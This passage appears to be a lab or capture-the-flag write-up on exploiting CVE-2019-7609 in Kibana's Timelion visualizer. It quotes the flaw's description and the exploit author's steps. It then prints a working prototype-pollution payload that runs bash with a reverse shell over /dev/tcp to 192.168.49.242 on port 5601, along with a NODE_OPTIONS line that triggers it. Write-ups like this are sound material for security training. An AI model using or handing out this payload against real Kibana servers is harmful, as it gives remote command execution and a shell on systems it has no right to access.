Exploitation

This machine has taught me to not rely fully on searchsploit since there will be times that exploits will not come up. So we just google.

GitHub - mpgn/CVE-2019-7609: RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizerGitHub

Looking it up lead me here, this website said the following:

Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.

Which is good because now this means that we could execue commands and get a reverse shell.

Exploit

Open Kibana
Past one of the following payload into the Timelion visualizer
Click run
On the left panel click on Canvas
Your reverse shell should pop ! :)

These are the exact instructions from the author.

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/192.168.49.242/5601 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

I also had to cycle through open ports.

PreviousMYSQL NextPriv Escalation

Last updated 2 years ago